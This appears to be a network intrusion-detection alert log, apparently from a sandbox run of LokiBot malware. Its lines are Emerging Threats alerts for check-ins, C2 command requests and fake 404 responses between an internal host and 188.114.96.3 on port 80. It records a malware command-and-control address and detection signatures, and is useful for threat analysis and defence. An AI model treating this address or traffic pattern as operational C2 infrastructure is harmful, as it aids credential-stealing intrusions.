                  2024-09-25T15:29:15.163543+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455917188.114.96.380TCP
                  2024-09-25T15:29:15.163543+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455917188.114.96.380TCP
                  2024-09-25T15:29:15.172021+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455917TCP
                  2024-09-25T15:29:15.345683+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455918188.114.96.380TCP
                  2024-09-25T15:29:15.345683+02002025381ET MALWARE LokiBot Checkin1192.168.2.455918188.114.96.380TCP
                  2024-09-25T15:29:15.345683+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455918188.114.96.380TCP
                  2024-09-25T15:29:16.082398+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455918188.114.96.380TCP
                  2024-09-25T15:29:16.082398+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455918188.114.96.380TCP
                  2024-09-25T15:29:16.087444+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455918TCP
                  2024-09-25T15:29:16.357807+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455919188.114.96.380TCP
                  2024-09-25T15:29:16.357807+02002025381ET MALWARE LokiBot Checkin1192.168.2.455919188.114.96.380TCP
                  2024-09-25T15:29:16.357807+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455919188.114.96.380TCP
                  2024-09-25T15:29:17.069655+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455919188.114.96.380TCP
                  2024-09-25T15:29:17.069655+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455919188.114.96.380TCP
                  2024-09-25T15:29:17.074546+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455919TCP
                  2024-09-25T15:29:17.230322+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455920188.114.96.380TCP
                  2024-09-25T15:29:17.230322+02002025381ET MALWARE LokiBot Checkin1192.168.2.455920188.114.96.380TCP
                  2024-09-25T15:29:17.230322+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455920188.114.96.380TCP
                  2024-09-25T15:29:17.927204+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455920188.114.96.380TCP
                  2024-09-25T15:29:17.927204+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455920188.114.96.380TCP
                  2024-09-25T15:29:17.932139+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455920TCP
                  2024-09-25T15:29:18.111648+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455921188.114.96.380TCP
                  2024-09-25T15:29:18.111648+02002025381ET MALWARE LokiBot Checkin1192.168.2.455921188.114.96.380TCP
                  2024-09-25T15:29:18.111648+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455921188.114.96.380TCP
                  2024-09-25T15:29:18.781204+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455921188.114.96.380TCP
                  2024-09-25T15:29:18.781204+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455921188.114.96.380TCP
                  2024-09-25T15:29:18.786816+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455921TCP
                  2024-09-25T15:29:18.948583+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455922188.114.96.380TCP
                  2024-09-25T15:29:18.948583+02002025381ET MALWARE LokiBot Checkin1192.168.2.455922188.114.96.380TCP
                  2024-09-25T15:29:18.948583+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455922188.114.96.380TCP
                  2024-09-25T15:29:19.609687+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455922188.114.96.380TCP
                  2024-09-25T15:29:19.609687+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455922188.114.96.380TCP
                  2024-09-25T15:29:19.614844+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455922TCP
                  2024-09-25T15:29:19.785848+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455923188.114.96.380TCP
                  2024-09-25T15:29:19.785848+02002025381ET MALWARE LokiBot Checkin1192.168.2.455923188.114.96.380TCP
                  2024-09-25T15:29:19.785848+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455923188.114.96.380TCP
                  2024-09-25T15:29:20.495550+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455923188.114.96.380TCP
                  2024-09-25T15:29:20.495550+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455923188.114.96.380TCP
                  2024-09-25T15:29:20.501107+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455923TCP
                  2024-09-25T15:29:20.658125+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455924188.114.96.380TCP
                  2024-09-25T15:29:20.658125+02002025381ET MALWARE LokiBot Checkin1192.168.2.455924188.114.96.380TCP
                  2024-09-25T15:29:20.658125+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455924188.114.96.380TCP
                  2024-09-25T15:29:21.686655+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455924188.114.96.380TCP
                  2024-09-25T15:29:21.686655+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455924188.114.96.380TCP
                  2024-09-25T15:29:21.691492+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455924TCP
                  2024-09-25T15:29:21.877333+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455925188.114.96.380TCP
                  2024-09-25T15:29:21.877333+02002025381ET MALWARE LokiBot Checkin1192.168.2.455925188.114.96.380TCP
                  2024-09-25T15:29:21.877333+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455925188.114.96.380TCP
                  2024-09-25T15:29:22.674104+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455925188.114.96.380TCP
                  2024-09-25T15:29:22.674104+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455925188.114.96.380TCP
                  2024-09-25T15:29:22.680605+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455925TCP
                  2024-09-25T15:29:22.966391+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455926188.114.96.380TCP
                  2024-09-25T15:29:22.966391+02002025381ET MALWARE LokiBot Checkin1192.168.2.455926188.114.96.380TCP
                  2024-09-25T15:29:22.966391+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455926188.114.96.380TCP
                  2024-09-25T15:29:23.754090+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455926188.114.96.380TCP
                  2024-09-25T15:29:23.754090+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455926188.114.96.380TCP
                  2024-09-25T15:29:23.758949+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455926TCP
                  2024-09-25T15:29:23.928498+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455927188.114.96.380TCP
                  2024-09-25T15:29:23.928498+02002025381ET MALWARE LokiBot Checkin1192.168.2.455927188.114.96.380TCP
                  2024-09-25T15:29:23.928498+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455927188.114.96.380TCP
                  2024-09-25T15:29:24.756018+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455927188.114.96.380TCP
                  2024-09-25T15:29:24.756018+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455927188.114.96.380TCP
                  2024-09-25T15:29:24.760805+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455927TCP
                  2024-09-25T15:29:24.921645+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455928188.114.96.380TCP
                  2024-09-25T15:29:24.921645+02002025381ET MALWARE LokiBot Checkin1192.168.2.455928188.114.96.380TCP
                  2024-09-25T15:29:24.921645+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455928188.114.96.380TCP
                  2024-09-25T15:29:26.878403+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455928188.114.96.380TCP
                  2024-09-25T15:29:26.878403+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455928188.114.96.380TCP
                  2024-09-25T15:29:26.883421+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455928TCP
                  2024-09-25T15:29:27.055675+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455929188.114.96.380TCP
                  2024-09-25T15:29:27.055675+02002025381ET MALWARE LokiBot Checkin1192.168.2.455929188.114.96.380TCP
                  2024-09-25T15:29:27.055675+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455929188.114.96.380TCP
                  2024-09-25T15:29:27.710722+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455929188.114.96.380TCP
                  2024-09-25T15:29:27.710722+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455929188.114.96.380TCP
                  2024-09-25T15:29:27.715578+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455929TCP
                  2024-09-25T15:29:27.870221+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455931188.114.96.380TCP
                  2024-09-25T15:29:27.870221+02002025381ET MALWARE LokiBot Checkin1192.168.2.455931188.114.96.380TCP
                  2024-09-25T15:29:27.870221+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455931188.114.96.380TCP
                  2024-09-25T15:29:28.623111+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455931188.114.96.380TCP
                  2024-09-25T15:29:28.623111+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455931188.114.96.380TCP
                  2024-09-25T15:29:28.631311+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455931TCP
                  2024-09-25T15:29:28.942773+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455932188.114.96.380TCP
                  2024-09-25T15:29:28.942773+02002025381ET MALWARE LokiBot Checkin1192.168.2.455932188.114.96.380TCP
                  2024-09-25T15:29:28.942773+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455932188.114.96.380TCP
                  2024-09-25T15:29:29.616024+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455932188.114.96.380TCP
                  2024-09-25T15:29:29.616024+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455932188.114.96.380TCP
                  2024-09-25T15:29:29.620789+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455932TCP
                  2024-09-25T15:29:29.777253+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455933188.114.96.380TCP
                  2024-09-25T15:29:29.777253+02002025381ET MALWARE LokiBot Checkin1192.168.2.455933188.114.96.380TCP
                  2024-09-25T15:29:29.777253+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455933188.114.96.380TCP
                  2024-09-25T15:29:30.431091+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455933188.114.96.380TCP
                  2024-09-25T15:29:30.431091+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455933188.114.96.380TCP
                  2024-09-25T15:29:30.436181+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455933TCP
                  2024-09-25T15:29:30.591674+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455934188.114.96.380TCP
                  2024-09-25T15:29:30.591674+02002025381ET MALWARE LokiBot Checkin1192.168.2.455934188.114.96.380TCP
                  2024-09-25T15:29:30.591674+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455934188.114.96.380TCP
                  2024-09-25T15:29:31.557337+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455934188.114.96.380TCP
                  2024-09-25T15:29:31.557337+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455934188.114.96.380TCP
                  2024-09-25T15:29:31.579554+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455934TCP
                  2024-09-25T15:29:31.906770+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455935188.114.96.380TCP
                  2024-09-25T15:29:31.906770+02002025381ET MALWARE LokiBot Checkin1192.168.2.455935188.114.96.380TCP
                  2024-09-25T15:29:31.906770+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455935188.114.96.380TCP
                  2024-09-25T15:29:32.624051+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455935188.114.96.380TCP
                  2024-09-25T15:29:32.624051+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455935188.114.96.380TCP
                  2024-09-25T15:29:32.628954+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455935TCP
                  2024-09-25T15:29:32.797954+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455936188.114.96.380TCP
                  2024-09-25T15:29:32.797954+02002025381ET MALWARE LokiBot Checkin1192.168.2.455936188.114.96.380TCP
                  2024-09-25T15:29:32.797954+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455936188.114.96.380TCP
                  2024-09-25T15:29:33.508697+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455936188.114.96.380TCP
                  2024-09-25T15:29:33.508697+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455936188.114.96.380TCP
                  2024-09-25T15:29:33.513537+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455936TCP
                  2024-09-25T15:29:33.663752+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455937188.114.96.380TCP
                  2024-09-25T15:29:33.663752+02002025381ET MALWARE LokiBot Checkin1192.168.2.455937188.114.96.380TCP
                  2024-09-25T15:29:33.663752+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455937188.114.96.380TCP
                  2024-09-25T15:29:34.368849+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455937188.114.96.380TCP
                  2024-09-25T15:29:34.368849+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455937188.114.96.380TCP
                  2024-09-25T15:29:34.373954+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455937TCP
                  2024-09-25T15:29:34.519787+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455938188.114.96.380TCP
                  2024-09-25T15:29:34.519787+02002025381ET MALWARE LokiBot Checkin1192.168.2.455938188.114.96.380TCP
                  2024-09-25T15:29:34.519787+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455938188.114.96.380TCP
                  2024-09-25T15:29:35.193903+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455938188.114.96.380TCP
                  2024-09-25T15:29:35.193903+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455938188.114.96.380TCP
                  2024-09-25T15:29:35.198670+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455938TCP
                  2024-09-25T15:29:35.353459+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455939188.114.96.380TCP
                  2024-09-25T15:29:35.353459+02002025381ET MALWARE LokiBot Checkin1192.168.2.455939188.114.96.380TCP
                  2024-09-25T15:29:35.353459+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455939188.114.96.380TCP
                  2024-09-25T15:29:36.042891+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455939188.114.96.380TCP
                  2024-09-25T15:29:36.042891+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455939188.114.96.380TCP
                  2024-09-25T15:29:36.047855+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455939TCP
                  2024-09-25T15:29:36.192350+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455940188.114.96.380TCP
                  2024-09-25T15:29:36.192350+02002025381ET MALWARE LokiBot Checkin1192.168.2.455940188.114.96.380TCP
                  2024-09-25T15:29:36.192350+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455940188.114.96.380TCP
                  2024-09-25T15:29:36.930414+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455940188.114.96.380TCP
                  2024-09-25T15:29:36.930414+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455940188.114.96.380TCP
                  2024-09-25T15:29:36.935469+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455940TCP
                  2024-09-25T15:29:37.117852+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455941188.114.96.380TCP
                  2024-09-25T15:29:37.117852+02002025381ET MALWARE LokiBot Checkin1192.168.2.455941188.114.96.380TCP
                  2024-09-25T15:29:37.117852+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455941188.114.96.380TCP
                  2024-09-25T15:29:37.927518+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455941188.114.96.380TCP
                  2024-09-25T15:29:37.927518+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455941188.114.96.380TCP
                  2024-09-25T15:29:37.932328+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455941TCP
                  2024-09-25T15:29:38.099928+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455942188.114.96.380TCP
                  2024-09-25T15:29:38.099928+02002025381ET MALWARE LokiBot Checkin1192.168.2.455942188.114.96.380TCP
                  2024-09-25T15:29:38.099928+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455942188.114.96.380TCP
                  2024-09-25T15:29:38.890390+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455942188.114.96.380TCP
                  2024-09-25T15:29:38.890390+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455942188.114.96.380TCP
                  2024-09-25T15:29:38.895251+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455942TCP
                  2024-09-25T15:29:39.059740+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455943188.114.96.380TCP
                  2024-09-25T15:29:39.059740+02002025381ET MALWARE LokiBot Checkin1192.168.2.455943188.114.96.380TCP
                  2024-09-25T15:29:39.059740+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455943188.114.96.380TCP
                  2024-09-25T15:29:39.761200+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455943188.114.96.380TCP
                  2024-09-25T15:29:39.761200+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455943188.114.96.380TCP
                  2024-09-25T15:29:39.772496+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455943TCP
                  2024-09-25T15:29:39.928784+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455944188.114.96.380TCP
                  2024-09-25T15:29:39.928784+02002025381ET MALWARE LokiBot Checkin1192.168.2.455944188.114.96.380TCP
                  2024-09-25T15:29:39.928784+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455944188.114.96.380TCP
                  2024-09-25T15:29:40.653978+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455944188.114.96.380TCP
                  2024-09-25T15:29:40.653978+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455944188.114.96.380TCP
                  2024-09-25T15:29:40.659576+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455944TCP
                  2024-09-25T15:29:40.808147+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455945188.114.96.380TCP
                  2024-09-25T15:29:40.808147+02002025381ET MALWARE LokiBot Checkin1192.168.2.455945188.114.96.380TCP
                  2024-09-25T15:29:40.808147+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455945188.114.96.380TCP
                  2024-09-25T15:29:41.471815+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455945188.114.96.380TCP
                  2024-09-25T15:29:41.471815+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455945188.114.96.380TCP
                  2024-09-25T15:29:41.476685+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455945TCP
                  2024-09-25T15:29:41.638243+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455946188.114.96.380TCP
                  2024-09-25T15:29:41.638243+02002025381ET MALWARE LokiBot Checkin1192.168.2.455946188.114.96.380TCP
                  2024-09-25T15:29:41.638243+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455946188.114.96.380TCP
                  2024-09-25T15:29:42.305950+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455946188.114.96.380TCP
                  2024-09-25T15:29:42.305950+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455946188.114.96.380TCP
                  2024-09-25T15:29:42.310743+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455946TCP
                  2024-09-25T15:29:42.475611+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455947188.114.96.380TCP
                  2024-09-25T15:29:42.475611+02002025381ET MALWARE LokiBot Checkin1192.168.2.455947188.114.96.380TCP
                  2024-09-25T15:29:42.475611+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455947188.114.96.380TCP
                  2024-09-25T15:29:43.162638+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455947188.114.96.380TCP
                  2024-09-25T15:29:43.162638+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455947188.114.96.380TCP
                  2024-09-25T15:29:43.167479+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455947TCP
                  2024-09-25T15:29:43.324953+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455948188.114.96.380TCP
                  2024-09-25T15:29:43.324953+02002025381ET MALWARE LokiBot Checkin1192.168.2.455948188.114.96.380TCP
                  2024-09-25T15:29:43.324953+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455948188.114.96.380TCP
                  2024-09-25T15:29:44.097010+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455948188.114.96.380TCP
                  2024-09-25T15:29:44.097010+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455948188.114.96.380TCP
                  2024-09-25T15:29:44.101969+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455948TCP
                  2024-09-25T15:29:44.263622+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455949188.114.96.380TCP
                  2024-09-25T15:29:44.263622+02002025381ET MALWARE LokiBot Checkin1192.168.2.455949188.114.96.380TCP
                  2024-09-25T15:29:44.263622+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455949188.114.96.380TCP
                  2024-09-25T15:29:45.056343+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455949188.114.96.380TCP
                  2024-09-25T15:29:45.056343+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455949188.114.96.380TCP
                  2024-09-25T15:29:45.061185+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455949TCP
                  2024-09-25T15:29:45.374185+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455950188.114.96.380TCP
                  2024-09-25T15:29:45.374185+02002025381ET MALWARE LokiBot Checkin1192.168.2.455950188.114.96.380TCP
                  2024-09-25T15:29:45.374185+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455950188.114.96.380TCP
                  2024-09-25T15:29:46.147975+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455950188.114.96.380TCP
                  2024-09-25T15:29:46.147975+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455950188.114.96.380TCP
                  2024-09-25T15:29:46.152919+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455950TCP
                  2024-09-25T15:29:46.306365+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455951188.114.96.380TCP
                  2024-09-25T15:29:46.306365+02002025381ET MALWARE LokiBot Checkin1192.168.2.455951188.114.96.380TCP
                  2024-09-25T15:29:46.306365+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455951188.114.96.380TCP
                  2024-09-25T15:29:47.186447+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455951188.114.96.380TCP
                  2024-09-25T15:29:47.186447+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455951188.114.96.380TCP
                  2024-09-25T15:29:47.191361+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455951TCP
                  2024-09-25T15:29:47.360807+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455952188.114.96.380TCP
                  2024-09-25T15:29:47.360807+02002025381ET MALWARE LokiBot Checkin1192.168.2.455952188.114.96.380TCP
                  2024-09-25T15:29:47.360807+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455952188.114.96.380TCP
                  2024-09-25T15:29:48.240064+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455952188.114.96.380TCP
                  2024-09-25T15:29:48.240064+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455952188.114.96.380TCP
                  2024-09-25T15:29:48.244918+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455952TCP
                  2024-09-25T15:29:48.414802+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455953188.114.96.380TCP
                  2024-09-25T15:29:48.414802+02002025381ET MALWARE LokiBot Checkin1192.168.2.455953188.114.96.380TCP
                  2024-09-25T15:29:48.414802+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455953188.114.96.380TCP
                  2024-09-25T15:29:49.512910+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455953188.114.96.380TCP
                  2024-09-25T15:29:49.512910+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455953188.114.96.380TCP
                  2024-09-25T15:29:49.520363+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455953TCP
                  2024-09-25T15:29:49.677411+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455954188.114.96.380TCP
                  2024-09-25T15:29:49.677411+02002025381ET MALWARE LokiBot Checkin1192.168.2.455954188.114.96.380TCP
                  2024-09-25T15:29:49.677411+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455954188.114.96.380TCP
                  2024-09-25T15:29:50.344616+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455954188.114.96.380TCP
                  2024-09-25T15:29:50.344616+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455954188.114.96.380TCP
                  2024-09-25T15:29:50.349453+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455954TCP
                  2024-09-25T15:29:50.524174+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455955188.114.96.380TCP
                  2024-09-25T15:29:50.524174+02002025381ET MALWARE LokiBot Checkin1192.168.2.455955188.114.96.380TCP
                  2024-09-25T15:29:50.524174+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455955188.114.96.380TCP
                  2024-09-25T15:29:51.275783+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455955188.114.96.380TCP
                  2024-09-25T15:29:51.275783+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455955188.114.96.380TCP
                  2024-09-25T15:29:51.280707+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455955TCP
                  2024-09-25T15:29:51.428232+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455956188.114.96.380TCP
                  2024-09-25T15:29:51.428232+02002025381ET MALWARE LokiBot Checkin1192.168.2.455956188.114.96.380TCP
                  2024-09-25T15:29:51.428232+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.455956188.114.96.380TCP
                  2024-09-25T15:29:52.197836+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.455956188.114.96.380TCP
                  2024-09-25T15:29:52.197836+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.455956188.114.96.380TCP
                  2024-09-25T15:29:52.202676+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.455956TCP
                  2024-09-25T15:29:52.541643+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.455957188.114.96.380TCP
                  2024-09-25T15:29:52.541643+02002025381ET MALWARE LokiBot Checkin1192.168.2.455957188.114.96.380TCP
